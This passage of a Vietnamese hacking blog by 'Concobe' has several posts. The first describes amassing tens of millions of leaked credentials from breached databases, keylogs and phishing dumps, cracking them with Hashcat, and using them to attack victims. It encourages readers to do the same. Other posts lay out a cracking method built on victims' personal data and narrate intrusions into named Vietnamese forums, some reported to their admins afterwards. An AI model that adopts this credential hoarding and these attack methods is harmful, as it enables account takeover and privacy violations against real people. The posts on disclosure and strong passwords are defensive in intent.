Cách đây khoảng 6 năm thì tôi đã bắt đầu có trong đầu ý tưởng tạo cho mình một nguồn tổng hợp thông tin của những người dùng trên mạng tại Việt Nam, dựa vào một bước trong quá trình pentest chuẩn của các giáo trình dạy hack nước ngoài là họ luôn đề cập đến quá trình thu thập thông tin là quan trọng và quyết định lớn nhất đến toàn bộ quá trình tấn công còn lại, tôi đã áp dụng và thấy điều này vô cùng đúng đắn cũng như có mức độ thành công khá cao ngay cả khi việc các bạn không tìm được lỗ hổng để tấn công vào hệ thống nhưng chính những thông tin các bạn đang sở hữu lại giúp đơn giản toàn bộ quá trình ấy.

Ban đầu nguồn thông tin vô cùng khó khăn và hiếm có tôi dường như phải craw rất nhiều info của các thành viên trên các diễn đàn như username, email, sdt,... và tổng hợp lại. Nhưng tôi thấy điều này vẫn chưa đủ nên tôi bắt đầu chuyển qua hướng thu thập khác hiệu quả và tốn nhiều công sức lẫn thời gian hơn đó là đi thu thập những database được các hacker công bố trên mạng và đem về tổng hợp lại, đây là một nguồn thông tin vô cùng hữu lý và thực tế đến khủng khiếp các bạn à, có được nguồn thông tin đó tôi lại tiếp tục tổng hợp và lưu trữ lại để bắt đầu vào quá trình xử lý khó khăn ở phía trước, đó là tìm cách "giải mã" những thông tin về mật khẩu đã được mã hóa trong database của rất rất nhiều mã nguồn khác nhau với nhiều thuật toán mã hóa khó nhằn để làm sao có được plaintext của càng nhiều thành viên càng tốt.

Khó khăn nhất là xử lý những nguồn thông tin mã hóa từ các diễn đàn Vbulletin ở VN với thuật toán mã hóa md5(md5($pass).$salt) tôi đã chết một cái card GPU vì cắm tool cho nó brute-force đống hash của thuật toán này :(. Sở dĩ tôi nhắm đến nguồn tài nguyên này vì vài năm trước gần như ở VN thì diễn đàn là nguồn cung cấp thông tin lớn nhất và phổ biến nhất.

Đỉnh điểm của quá trình lưu trữ là khi tôi nhận được những đường link chia sẻ database của vài trang web rất lớn ở VN với lượng thành viên lên đến hàng triệu thành viên và thật may mắn khi những nguồn này sử dụng thuật toán mã hóa mật khẩu cho thành viên bằng thuật toán MD5, tôi đã thành công khi tiến hành brute-force với nguồn hash này với tỉ lệ hơn 90% một tỉ lệ thành công khủng khiếp, có lẽ một phần là do rất nhiều các bạn có thói quen sử dụng mật khẩu không mấy phức tạp đã giúp tôi đạt được tỉ lệ đó.

Tôi cũng có được một sự ưu ái không nhỏ của một thành viên trong một diễn đàn hacking ở VN đã kết thân và chia sẻ cho tôi toàn bộ thông tin keylog mà cậu ấy đã sở hữu từ rất lâu được lưu trữ trên gmail với dung lượng ~8Gb, các bạn có thể hình dung ra nguồn info này nó quý giá và kinh khủng ra sao rồi, nhớ lại lúc xử lý đống info đó mà tôi vẫn còn thấy rùng mình, một thời oai hùng của cậu ấy chỉ với mục đích là log cho vui.

Ngoài ra tôi còn tổng hợp thông tin trên rất rất nhiều kênh chia sẻ của các hacker như thông tin keylog username, password, email của những phong trào fake login facebook, fakelogin các tài khoản game được chia sẻ tràn lan trên pastebin và các nguồn khác, chỉ cần dùng vài dork cơ bản với google thì các bạn cũng có thể có một nguồn thông tin đủ để dùng rồi.

Đến bây giờ tôi vẫn tiếp tục cập nhật (update) nguồn thông tin này vì nó thật sự hữu ích, chỉ cần biết nickname, hay email của victim là tôi bắt đầu tìm kiếm trong "sổ tử" nếu tồn tại thì khả năng trên 50% là tôi có thể sử dụng được nguồn thông tin này để tấn công leo cao hơn, do thói quen sử dụng chung một mật khẩu của rất nhiều người cho đến hiện tại và tôi nghĩ là nó sẽ không bao giờ lỗi thời.

Nguồn thông tin tôi tổng hợp hiện tại có dạng:
- username, password, email, sdt, ngày sinh ( password có 2 dạng 1 là plaintext, 2 là còn mã hóa do chưa brute-force ra)
- Được lưu trữ trong CSDL.
- Và còn rất nhiều những database khác mà tôi chưa có thời gian để xử lý chúng.

Phần mềm và nguồn wordlist tôi dùng để thực hiện gồm:
- Hashcat ( phần mềm hỗ trợ brute-force với rất nhiều thuật toán)
- Wordlist được chia sẻ rất nhiều trên mạng.
- Wordlist được chính tôi tổng hợp dựa vào chính nguồn thông tin của các thành viên như username, hay phần đầu của email mà tôi thu gom được.
- Wordlist được tạo ra dựa theo toàn bộ các đầu số điện thoại của các nhà mạng ở VN
- Wordlist ... rất nhiều =]]

Kết luận:
- Sổ tử mà tôi đang sở hữu có số lượng thông tin được tính bằng chục triệu dòng dữ liệu.
- Nếu bạn có hứng thú, hãy bắt đầu thu thập và tổng hợp, một ngày nào đó bạn sẽ thành công.
- Đây là project không dành cho những ai có tính kiên nhẫn ít và lười biếng.
- Bạn hãy luôn sài mật khẩu mạnh và đừng dùng chung một cho tất cả nhé, nếu không tôi sẽ dòm ngó bạn đấy.
- Bỏ luôn ý định dùng SDT làm mật khẩu đi, nó vô dụng với tôi rồi.
- Sổ tử đã phát huy được uy lực của nó, nhưng tôi vẫn tiếp tục update và không dừng lại.

Concobe

Thứ Tư, 5 tháng 7, 2017

pwned upload69.net



Chuyện xảy ra rồi, tôi cũng report và bên thiendia[.]com cũng fix rồi nên viết lên đây vài dòng lưu lại chút gì đó để nhớ sau này.Pwned upload69.net site upload hình ảnh của bên thiendia - lauxanh



Chỉ một tấm hình nhỏ nhưng ý nghĩa không nhỏ, ý tôi nói là cái dung lượng file backup đấy :v

Kết luận: Đôi khi chỉ cần bạn đến đúng thời điểm, bạn sẽ có cái bạn có.

Concobe

Thứ Tư, 28 tháng 6, 2017

Cơ hội cho những ai biết nắm bắt.


Có những lúc, không có lần sau, không có cơ hội bắt đầu lại.
Có những lúc, bỏ lỡ hiện tại, vĩnh viễn không còn cơ hội nữa.



Hãy nhờ rằng: Tôi luôn luôn cho các bạn cơ hội để lựa chọn.

Concobe

Thứ Hai, 19 tháng 6, 2017

Cục cảnh sát phòng chống tội phạm sử dụng công nghệ cao

TỔNG CỤC CẢNH SÁT
CỤC CẢNH SÁT PHÒNG, CHỐNG TỘI PHẠM SỬ DỤNG CÔNG NGHỆ CAO

Cục Cảnh sát phòng, chống tội phạm sử dụng công nghệ cao thuộc Tổng cục Cảnh sát, có trách nhiệm giúp Tổng Cục trưởng Tổng cục Cảnh sát chỉ đạo, kiểm tra, hướng dẫn lực lượng Cảnh sát phòng, chống tội phạm sử dụng công nghệ cao trong cả nước, tiến hành các biện pháp phòng ngừa, phát hiện, điều tra, xử lý tội phạm sử dụng công nghệ cao; trực tiếp tiến hành các biện pháp phòng ngừa, phát hiện, đấu tranh chống các hành vi vi phạm và tội phạm sử dụng công nghệ cao theo quy định của pháp luật và của Bộ trưởng Bộ Công an.





Mọi thông tin tố giác tội phạm có liên quan xin gửi về: 
Miền Bắc:
Địa chỉ: Cục Cảnh sát PCTP sử dụng Công nghệ cao, số 47 Phạm Văn Đồng, Cầu Giấy, Hà Nội.
Email: C50@canhsat.vn
Điện thoại: 069.2321161 hoặc 069.2321154
Miền Nam:
Địa chỉ: 258 Nguyễn Trãi, Q I – TPHCM
Điện thoại: 069.37125

Concobe

Thứ Bảy, 3 tháng 6, 2017

Tôi sẽ làm gì khi có được hash pass của bạn?

Đây là chút kinh nghiệm nhỏ trong tổng quan các bước tấn công một victim mà Concobe muốn chia sẻ đến cho các bạn, để phần nào các bạn hiểu được liệu cái thuật toán mã hóa mật khẩu và cái mật khẩu bạn đang sử dụng có thật sự an toàn hay không? Hãy tự mình kiểm nghiệm lại và thay đổi cho thích hợp để hạn chế những rủi ro sau này.

Note: Bài viết này chỉ áp dụng cho phần lớn thói quen của người dùng bình thường, còn các chuyên gia, các bạn khác người có thể bỏ qua.



Bỏ qua các bước tận dụng lỗ hổng, hack hiếc,...và bằng cách nào đó tôi có được cái hash là bản mã hóa của mật khẩu các bạn đang sài, câu hỏi bây giờ là.Tôi sẽ làm gì với cái hash đó để có được mật khẩu dạng rõ của bạn?

Bước 1: Đầu tiên là tôi sẽ thu gom tất tần tật những thông tin gì có liên quan đến bạn, đó là điều hiển nhiên và bắt buộc nếu tôi muốn tấn công bạn, những thông tin mà tôi sẽ chú trọng thu gom sẽ bao gồm:

1. Ngày tháng năm sinh, của bạn, vợ bạn, cha mẹ, con cái của bạn,...ngày tháng năm sinh của họ hàng gần gũi nhất với bạn.
2. Họ và tên đầy đủ của bạn, vợ bạn, cha mẹ, con cái của bạn,...của những ai là họ hàng gần gũi nhất với bạn.
3. Tên nickname của bạn và mọi người gần gũi với bạn, kể cả những tên lóng, tên gọi ở nhà,... Miễn là bạn public nó và tôi thu gom được là tôi gom sạch.
3. Số điện thoại và toàn bộ email cũng tương tự.
4. Địa chỉ nhà tôi cũng không tha nếu tôi tìm thấy nó.
5. Gom thông tin của bạn ở nhưng trang web mà bạn đã tham gia, biết đâu tôi lại tìm được thói quen của bạn thì sao :D
6. Nếu bạn có website riêng thì ngay cả cái domain của bạn tôi cũng đưa vào danh sách luôn.
7. ...Tóm lại là tôi thấy cái gì tôi sẽ gom cái đó, không từ thông tin nào mô tả hay liên quan về các bạn cả, thấy tui ghê chưa?

Bước 2:
Tôi bắt đầu xử lý hết những thông tin đã thu gom ở bước một và lọc ra những từ khóa mà tôi tự đánh giá là có khả năng trở thành một thành phần trong chuỗi mật khẩu của các bạn.
Vd:

- Nhiều bạn hay dùng ngày tháng năm sinh để làm mật khẩu lắm nè.
- Rất nhiều bạn dùng kết hợp ngày tháng năm sinh của bản thân với người yêu, vợ, con,...
- Cũng kha khá người dùng tên nickname làm mật khẩu luôn, cũng có bạn kết hợp nickname và ngày, tháng, năm sinh.
- Số điện thoại thì khỏi nói luôn, nhiều vô số kể, và kết hợp 3,4 số cuối với tên thật, nickname, email để làm mật khẩu cũng không ngoại lệ.
- Có bạn chơi luôn địa chỉ cty, địa chỉ nhà với tên đường làm mật khẩu luôn mới kinh chứ.
- Hoặc đơn giản là cái địa chỉ email, hay cái tên miền website các bạn đang sở hữu kèm theo vài biến tấu cũng rất được nhiều người ưa chuộng.
- ...Đó là đơn cử một vài những thông tin mà tôi thường chú trọng sàng lọc, rút gọn để xử lý trước.


Bước 3:
Giờ tôi sẽ bắt đầu dùng những công cụ hỗ trợ để tạo ra một cái từ điển từ chính những thông tin mà tôi sàng lọc ở bước thứ 2, kết quả sẽ là một bộ từ điển tổng hợp, kết hợp mọi tình huống, mọi trường hợp có thể có từ những từ khóa đó, kể cả những kết quả sinh ra dường như là vô nghĩa luôn.Có được cái từ điển tổng hợp này rồi thì tôi sẽ bắt đầu chuyển qua bước thứ 4.

Bước 4:
Dùng công cụ brute force và bắt đầu thử dò trên cái từ điển đã tạo ra ở bước thứ 3, lúc này chỉ là một bộ từ điển thuần khiết mà thôi một sự kết hợp của các thông tin liên quan.Khoảng 50% theo kinh nghiệm của tôi thì tới đây là tôi có thể dùng cuộc chơi được rồi, vì theo thói quen thì đa số những mật khẩu họ sài đều có trong bộ từ điển này cả.

Trừ những ai có chút cẩn thận thì họ có thể viết hoa, viết thường, thêm vài ký tự đặc biệt vào cuối mật khẩu,...đến lúc này thì sẽ khó khăn và kéo dài thời gian brute-force hơn chút xíu nhưng không sao, các công cụ đã có hỗ trợ rất tốt các vấn đề này rồi, quan trọng là bạn có chịu chơi tiếp hay không thôi :D Còn tôi thì vẫn tiếp tục chơi thêm vài trường hợp như trên, tầm khoảng 30% sẽ rụng nụ ở bước này, tức là mật khẩu của họ có kết hợp giữa các thông tin ở bước số 2 nằm trong bộ từ điển đã có ở bước số 3 kết hợp với một số thói quen tốt như viết hoa vài ký tự trong chuỗi mật khẩu, thêm vào đầu, cuối vài ký tự đặc biệt,...

Nếu qua bước này mà tôi vẫn chưa ra được mật khẩu của các bạn thì tôi sẽ trở về bước 2 để gom thêm những thông tin đã không dùng ở lần 1 vì biết đâu tôi còn thiếu chút gì đó trong đó thì sao, nếu như vẫn không thành công thì tôi sẽ xem bạn là người cẩn thận và tùy theo ngữ cảnh, nếu bạn không quan trọng thì tôi bỏ qua bạn.Còn nếu bạn quá quan trọng với tôi lúc này thì tôi sẽ phải bỏ tiền ra để nhờ những người chuyên bán dịch vụ này ở nước ngoài để họ dùng những phần cứng chuyên dụng hơn và tất nhiên thì có tiền có thể giải quyết được gần như tất cả. Đó là kinh nghiệm của tôi đấy.

Tóm lại là nếu bạn có thói quen dùng những thông tin gần gũi với bạn để làm mật khẩu mà không có biến tấu hay xào nấu gì thêm thì các bạn nên đổi lại mật khẩu mới cho an toàn.Một vài gợi ý cho việc đặt mật khẩu mà tôi đã dịch lại trước đây dựa vào những lời khuyên của các chuyên gia bảo mật của Google ở bài viết này: "Cách tạo mật khẩu mạnh cho tài khoản trên mạng."
link: http://concobexgr.blogspot.com/2016/08/cach-tao-mat-khau-manh-cho-tai-khoan.html

Phần mềm tôi hay sử dụng gồm:

1. Phần mềm tạo wordlist như crunch rất có tiếng trong giới hack pass wifi :D. Vì nhu cầu cá nhân nên tôi có sài một cái soft riêng của tôi.
2. Phần mềm để brute-force hash tôi hay dùng là hashcat (rất nổi tiếng, hỗ trợ đa nền tảng), passwordpro (đã ngừng hỗ trợ), hash manager, John the Ripper,...


Concobe

Thứ Hai, 29 tháng 5, 2017

Nên làm gì khi bạn được hacker, pentester Report lỗ hổng?

Nếu bạn quản trị một website, một hệ thống hay đơn giản chỉ là cái địa chỉ email của bạn bị lộ mật khẩu, nhưng có ai đó gởi thông tin cảnh báo lỗ hổng cho bạn thì việc đầu tiên bạn nên làm đó là kiểm tra tính thực tế và mức độ chính xác của thông tin bằng cách so sánh giữa thông tin của bạn đang có và thông tin bạn được hacker, pentester thông báo.




Nếu những thông tin đó đúng với những gì họ thông báo thì bạn nên trả lời lại người đó và xác thực là đã nhận được lời cảnh báo và xác thực lỗ hổng có tồn tại là điều tối thiểu các bạn nên làm, sau đó mới bắt đầu vào việc vá lỗ hổng ngay lập tức, đừng chần chờ hay nghĩ rằng sẽ không ai tấn công hay gây tổn hại cho các bạn cả đâu,...Suy nghĩ này vô cùng nguy hiểm và kết quả của việc thiệt hại đa phần thuộc về chính các bạn, vì sao tôi nói như thế?


Một lỗ hổng được công bố (public) trên mạng sẽ có rất rất nhiều người trên thế giới và cả quốc gia của bạn đang đặt hệ thống đó biết, không ai dám chắc rằng hệ thống của bạn sẽ an toàn với cộng đồng mạng nói chung và giới bảo mật nói riêng khi mắc lỗ hổng đó được.

Có thể bạn sẽ luôn bị theo dõi bởi đối thủ của bạn, họ luôn luôn theo sát và chờ cơ hội, khi gặp thời cơ đến thì tôi nghĩ họ sẽ không bỏ qua nó đâu,...Có vô vàn lý do để có thể dẫn đến việc tổn hại cho hệ thống khi tồn tại lỗ hổng mà chúng ta không bao giờ được xem thường nó cả, đừng bao giờ nghĩ mình cao siêu, cty mình lớn tụi nó không dám làm gì đâu, hay hệ thống mình tốt thế thách đứa nào vào được, mật khẩu mình đặt khó thế nó có lấy được cũng không giải mã ra đâu,...Tôi xin nhắc lại và nhấn mạnh rằng, có nhiều con quái vật ở ngoài căn nhà các bạn lắm, có con núp lùm, có con lộ diện và kết quả là bạn bị tổn thất chứ không phải ai khác cả.

Hãy luôn luôn thận trọng, luôn phản ứng nhanh và nhiệt tình để hệ thống được an toàn, đừng im lặng và âm thầm vá lỗ hổng của hệ thống rồi xem như chưa có chuyện gì xảy ra,...Đó là một sai lầm nghiêm trọng đấy, vì cái bạn nhận được đôi khi chỉ là một phần nhỏ hoặc những lỗ hổng mà thời điểm hiện tại bạn đang mắc phải, về lâu dài không ai đảm bảo bạn sẽ an toàn khi có thêm những lỗ hổng mới được phát hiện trên hệ thống của các bạn cả, rất rất nhiều hacker whitehat hay các pentester phàn nàn rằng họ không hề nhận được reply, hồi âm từ phía hệ thống mắc lỗ hổng, nhưng họ lại âm thầm vá lỗi như không có chuyện gì xảy ra, điều này làm cho những pentester đó cảm thấy họ không được tôn trọng, họ cảm thấy các làm việc của các bạn không hề chuyên nghiệp, chỉ biết lo cho bản thân các bạn.Và kết quả thì tôi nghĩ người chịu thiệt hại vẫn là những người quản trị hệ thống đó, sẽ không có ai giúp đỡ cho người mà họ bị "lơ", bị cho ăn "bơ" khi có lỗ hổng khác được phát hiện cả đâu, tin tôi đi đó là sự thật đấy.

Hãy nói lời cảm ơn những người đã âm thầm giúp bạn, dù chỉ là một lời cảm ơn chân thành.Đừng hù dọa họ, không có lợi cho các bạn đâu, tất cả những gì họ cần chỉ là lời cảm ơn chân thành cũng đủ rồi.

Nếu các bạn làm việc chuyên nghiệp hơn và hệ thống các bạn có tầm vóc hơn, hãy chuẩn bị những chương trình Bug bounty để tìm kiếm những pentester, whitehat hacker kiểm thử và tấn công, để tìm ra những điểm yếu còn tồn tại và gia cố hệ thống cho an toàn hơn.Hoặc cũng có thể liên hệ và ủng hộ ( donate ) người đã gởi thông báo đến cho các bạn, biết đâu các bạn sẽ nhận được thêm những thông tin quan trọng hơn, giúp hệ thống bạn an toàn hơn sau này thì sao.

Cuối cùng tôi vẫn chỉ mong các bạn đừng quên lời cảm ơn khi ai đó giúp bạn, đồng thời hãy nhanh tay vá lỗ hổng mà bạn nhận được thông báo càng sớm càng tốt.

Concobe

Thứ Năm, 27 tháng 4, 2017

Pwned diễn đàn Pubvn.tv, pubvn.net

Một ngày cuối tháng 3 hay đầu tháng 4 gì đó mình không nhớ rõ, có một bạn gởi link phim bên pubvn.tv cho mình xem vì phim này cũng hay, trước giờ mình chỉ làm thần dân bên phimmoi nên không có tài khoản và cũng không có nhu cầu về tài khoản vip ở pubvn.tv nên không xem ở diễn đàn này dù biết là website này rất nổi tiếng tại VN.Sẵn dịp có link nên click vào xem và phát hiện ra ngoài trang phim còn có thêm cái forum và máu xxx lại trỗi dậy, ngó ngang ngó dọc thấy pub sài mã nguồn Vbulletin version 4.x.x cũng khá thú vị nên test thử với những lỗ hổng đã được public thì khá hoảng khi phát hiện ra cái forum vẫn còn tồn tại cái lỗ hổng SQL Injection public từ năm ngoái :( Tiếp tục xxx vì lúc này máu nó dồn hết tới nơi cần tới rồi, lao vào chiến đấu thôi vì không thể dừng lại lúc này được :( và thế là có cái hình bên dưới.





Thấy có vẻ không ổn nên select thêm vài cái email của admin bên pubvn và gởi mail thông báo, có điều là sau gần chục ngày không ai reply nên cũng ráng tìm thử xem có tài khoản facebook của ad nào với cái mail đó không thì ra được 2 admin, report lần 2 cho hai người quản trị này.Mọi thứ vẫn im lặng cho đến ngày hôm sau thì admin Sứt Yêu đã reply lại và confirm Bugs đồng thời tiến hành vá lỗ hổng kèm theo lời cảm ơn.

Hôm sau trong lúc rảnh rỗi mình có xem lại toàn bộ quá trình pentest và thấy còn vài thông tin chưa xử lý dù nó không còn quan trọng nữa thế là lôi mấy hash md5 + salt của các tài khoản quản trị để tiến hành dùng Hashcat brute force với thuật toán md5(md5($pass).$salt)kết quả là dò ra được 2/4 mật khẩu của admin pubvn, lúc này mình cũng có thử đăng nhập nhưng một tài khoản bị cấm truy cập, tài khoản còn lại đăng nhập vào forum bình thường nhưng không vào được AdminCP của Vbulletin vì bên pubvn có thêm firewall ở bước này nên hệ thống cũng không ảnh hưởng gì khi tồn tại lỗ hổng này.Mình tiếp tục gởi thông báo lần 3 qua facebook cho admin để các admin thay đổi luôn thông tin này cho an toàn.

Kết thúc một cuộc tình chóng váng giữa Concobe và Pubvn, lại tiếp tục về mới phimmoi như mọi khi.

Thứ Tư, 26 tháng 4, 2017

Diadiemanuong.com và lỗ hổng vẫn chưa được fix.

Thật tình thì mình không có ý định viết bài này nhưng thật sự là thấy điều này ảnh hưởng đến rất nhiều người dùng ở VN nên đành phải nói lên vài lời để bạn nào đang sử dụng hoặc có tài khoản bên này hãy đổi mật khẩu mới và nhớ rằng đừng dùng chung mật khẩu với các tài khoản nào kẻo bị tấn công gián tiếp ảnh hưởng đến thông tin của các bạn.

Đầu tháng 4 mình có vô tình phát hiện ra lỗ hổng bảo mật ở mức rất cơ bản của admin, mình đã gởi email thông báo đến 2 địa chỉ email của diadiemanuong nhưng không thấy reply và lỗ hổng vẫn tồn tại, cách đây hai ngày mình kiểm tra lại email không thấy hồi âm nên có kiểm tra lại và lỗ hổng vẫn còn nên mình tiếp tục gởi thêm email cảnh báo đến 2 địa chỉ email của diadiemanuong.com, thông báo gởi thành công nhưng vẫn không có hồi âm, bug vẫn tồn tại.



Đành viết vài dòng để nhắc nhở đến những bạn nào đang có tài khoản ở diadiemanuong thì cẩn thận kẻo bị ảnh hưởng nếu có ai đó tấn công vào với mục đích xấu.

Concobe

Thứ Ba, 25 tháng 4, 2017

Tôi đã pwn diễn đàn mmo4me.net thế nào.

Được sự đồng ý của admin NEO sau khi report lỗ hổng và bạn ấy đã fix hết lỗ hổng thì mình mới bắt đầu viết bài này để chia sẻ cho các bạn hướng tấn công mà mình đã dùng trong trường hợp này.


Mọi thứ bắt nguồn từ lỗi sơ hở của admin khi sài công cụ backup CSDL MysqlDumper để sao lưu CSDL trước đây và để lại thư mục công cụ đó trên server với tên /msd/ một cái tên khá phổ biến nằm trong tool của mình tổng hơp, dựa vào thói quen của các admin khi quản lý mã nguồn và CSDL.Tuy nhiên điểm chính yếu là những thông tin kết nối vào CSDL trong file config.php đã được thay đổi không còn quyền truy cập trực tiếp vào CSDL của mmo4me.net nữa nên mình ngồi xem logs.Logs sao lưu CSDL mà công cụ này tạo ra khi các bạn sử dụng để backup hay restore database, và một chút may mắn đã mỉm cười với mình khi thử dùng tên file đã sao lưu nằm trong thư mục /msd/work/backup/ten_file_backup_csdl.sql.gz đã tồn tại.

Mình có trong tay CSDL đã được backup của admin mmo4me.net cho forum mã nguồn xenforo, cũng khá phức tạp vì xenforo có nhiều tối ưu về bảo mật hơn một số mã nguồn diễn đàn phổ biến khác, đặc biệt là ở thuật toán mã hóa mật khẩu cũng tốt hơn rất nhiều khi dùng thuật toán bcrypt để mã hóa, mình có full info của admin trong CSDL gồm username:hash password:email.

Lúc này thì bắt đầu mình thấy có chút khó khăn xuất hiện vì với thuật toán này nếu brute force cũng mất khá nhiều thời gian, nên mình ngồi tổng hợp lại toàn bộ thông tin mà mình có được ở trong CSDL và trong quá trình thu thập thông tin để tạo thành một bộ wordlist có mối quan hệ gần nhất với victim này, bắt đầu brute force với thuật toán bcrypt wordlist đó lần thứ nhất không thành công, cũng khá thất vọng nhưng mình chưa từ bỏ, đành ngồi viết lại cái rules brute force dành riêng cho victim này, gồm những kiểu đặt mật khẩu phổ biến của các admin, như chữ hoa, chữ thường, thêm số, ký tự đặc biệt phổ biến, đổi chỗ,...Và lại tiếp tục brute lại với bộ wordlist đó, lần này thì sự kết hợp đó đã mang lại thành công.



Mật khẩu của admin đã có gồm chuỗi với 8 ký tự chữ thường không viết hoa được cắt ra từ một phần địa chỉ email của admin, kèm theo một dãy số 7 ký tự khá phổ biến mà mình đã thấy trong quá trình tổng hợp thông tin của admin, lần này sự kết hợp giữa rules và wordlist đã cho ra kết quả thật sự.

Giờ thì đã có đầy đủ những thứ cần thiết, login vào acc admin trên forum để test xem sao và... Chào mừng bạn quay lại diễn đàn...Dòng chữ ấy mang lại quá nhiều cảm xúc khó tả =]] Hăm hở click thẳng vào admin để đăng nhập vào admin control của forum xenforo nhưng ...Một cái trang trắng nhách như mắt ma xuất hiện làm tụt hết cảm xúc các bạn à, mất tầm 30 giây để lấy lại cảm xúc vì bị hụt một vố quá căng =)).Lẽ nào lại có thêm một bước xác thực nữa trước khi vào được admin control của victim chăng?Nghĩ đến đây thì mình liền quăng domain vào cái tool cóc ghẻ mình tổng hợp và hay sài, cho nó scan những công cụ mà các bài viết hướng dẫn bảo vệ admin.php, admincp,...đầy trên mạng và một lần nữa kinh nghiệm làm checker của mình gần chục năm đã khiến cho may mắn phải mỉm cười với mình :3

Một công cụ để thêm ip của mình vào danh sách whitelist thì mới có quyền dòm ngó vào admin control hiện ra, thấy vui vãi, click vào cái link và lại một lần nữa hụt hẫng, nguyên cái form yêu cầu nhập mật khẩu để quản trị cái tool addIP đó khiến tim mình rạn nứt :(( .Đến đây mình nghĩ có lẽ nên dừng lại được rồi, nên ngồi mở Lạc Trôi của sếp lên nghe và nó lạc trôi thật các bạn à, tự nhiên thấy bừng sáng với cái ý tưởng rất hữu lý bèn mở lại link tool addIP đó và điền thông tin mình nghĩ vào, thật không thể tin được,IP của bạn đã được thêm vào danh sách.Đang trôi nên thả trôi luôn lao vào /admin.php xem sao? thành công mỹ mãn.Kết thúc quá trình tấn công với nhiều cung bậc cảm xúc lên xuống tá lả.



Quên mất, nói thêm là cái pass mà mình nghĩ ra được nó nằm ở cái dãy 7 chữ số của cái pass đăng nhập vào tài khoản của admin đã brute ra ở trên đó mấy chế.

Tóm tắt toàn bộ quá trình:
1. Scan thông tin dựa vào thói quen admin và phát hiện công cụ backup đồng thời có luôn CSDL trong tay.
2. Brute force mật khẩu admin thành công (dựa vào thông tin thu thập và tự sáng tác rules để brute).
3. Tiếp tục scan thói quen bảo mật của admin và gặp may mắn khi scan ra cũng như lạc trôi có pass.
4. Login, chụp hình, sent email report cho admin, sau gần 1 tuần thì hỏi ý kiến admin NEO và public bài viết.

P/s: Thông tin là thứ rất quan trọng trong quá trình tấn công, chính vì thế đừng bao giờ bỏ qua bất kỳ thông tin nào của victim trong quá trình thu thập.Tận dụng triệt để thì thành công sẽ mỉm cười thôi.

Concobe

Thứ Sáu, 7 tháng 4, 2017

Social engineering là gì?

Social engineering là phương pháp phi kỹ thuật đột nhập vào hệ thống hoặc mạng công ty. Đó là quá trình đánh lừa người dùng của hệ thống, hoặc thuyết phục họ cung cấp thông tin có thể giúp chúng ta đánh bại bộ phận an ninh. Social engineering là rất quan trọng để tìm hiểu, bởi vì hacker có thể lợi dụng tấn công vào yếu tố con người và phá vỡ hệ thống kỹ thuật an ninh hiện tại. Phương pháp này có thể sử dụng để thu thập thông tin trước hoặc trong cuộc tấn công.

Social engineering sử dụng sự ảnh hưởng và sự thuyết phục để đánh lừa người dùng nhằm khai thác các thông tin có lợi cho cuộc tấn công hoặc thuyết phục nạn nhân thực hiện một hành động nào đó. Social engineer (người thực hiện công việc tấn công bằng phương pháp social engineering) thường sử dụng điện thoại hoặc internet để dụ dỗ người dùng tiết lộ thông tin nhạy cảm hoặc để có được họ có thể làm một chuyện gì đó để chống lại các chính sách an ninh của tổ chức. Bằng phương pháp này, Social engineer tiến hành khai thác các thói quen tự nhiên của người dùng, hơn là tìm các lỗ hổng bảo mật của hệ thống. Điều này có nghĩa là người dùng với kiến thức bảo mật kém cõi sẽ là cơ hội cho kỹ thuật tấn công này hành động.

Thông thường, mọi người không nhận thấy sai sót của họ trong việc bảo mật, mặc dù họ không cố ý. Những kẻ tấn công đặc biệt rất thích phát triển kĩ năng về Social Engineering và có thể thành thạo đến mức những nạn nhân của không hề biết rằng họ đang bị lừa. Mặc dù có nhiều chính sách bảo mật trong công ty, nhưng họ vẫn có thể bị hại do tin tặc lợi dụng lòng tốt và sự giúp đỡ của mọi người.

Những kẻ tấn công luôn tìm những cách mới để lấy được thông tin. Họ chắc chắn là họ nắm rõ vành đai bảo vệ và những người trực thuộc – nhân viên bảo vệ, nhân viên tiếp tân và những nhân viên ở bộ phận hỗ trợ – để lợi dụng sơ hở của họ. Thường thì mọi người dựa vào vẻ bề ngoài để phán đoán. Ví dụ, khi nhìn thấy một người mặc đồng phục màu nâu và mang theo nhiều hộp cơm, mọi người sẽ mở cửa vì họ nghĩ đây là người giao hàng. Hay khi bạn nhặt được một chiếc USB bạn có thể rất vô tư cắm nó ngay vào máy tính để xem nó là của ai và chứa thông tin gì. Nhưng đó có thể chính là nguồn phát tán virus và mã độc đến bạn, tổ chức và người thân của bạn.

Nguồn bài viết từ trang: http://securitydaily.net/social-engineering-va-cac-thu-thuat-tap-1/

Tôi đã dùng phương pháp này ra sao?

Một người anh rất thân của tôi cũng là dân IT và có niềm đam mê vào những thông tin, mánh khóe của giới bảo mật nhưng vì công việc và cuộc sống có quá nhiều bộn bề nên anh không có cơ hội để tìm hiểu sâu về nó, sau vài lần report bug của website mà anh ấy đang quản lý thì những thắc mắc ấy lại trỗi dậy, nên tôi quyết định áp dụng phương pháp Social engineering và thành công ngoài sự mong đợi, có lẽ sau khi viết bài này thì anh ấy sẽ nhận ra rằng anh ấy cũng đã mắc một sai lầm trong khâu bảo mật của mình và  chắc chắn là chuyện này sẽ không còn xảy ra trong tương lai vì những nguy hiểm tiềm ẩn mà tôi trình bày bên dưới:

Tôi và anh trao đổi, nói chuyện và anh cũng mở lòng chia sẻ là anh đang trong quá trình chuyển đổi mã nguồn website từ nguồn đóng sang nguồn mở, như mọi lần thì tôi cũng đều giúp anh pentest và chỉ ra những điểm yếu mà anh ấy đang mắc phải để khắc phục cho hệ thống an toàn thêm, lần này cũng không ngoại lệ, sau khi kết thúc thì hôm sau tôi chủ động hẹn anh ấy và anh em có một buổi ăn trưa tuyệt vời.

Trong buổi ăn trưa tôi cũng có trình bày những hướng tấn công phổ biến mà các hacker hay sử dụng từ webapp, đến hệ thống, những lỗ hổng nào ở tầng webapp phổ biến và mức độ nguy hiểm của nó,...và đi sâu xuống tầng hệ thống, kernel,...toàn những thông tin thực tế mà tôi đúc kết từ quá trình pentest của chính bản thân tôi khi gặp phải và cách xử lý ra sao?, khắc phục như thế nào?...Thú thật là đến thời điểm hiện tại trong bữa ăn trưa thì tôi vẫn chưa hề đụng được vào hệ thống mới mà anh ấy vừa xây dựng.

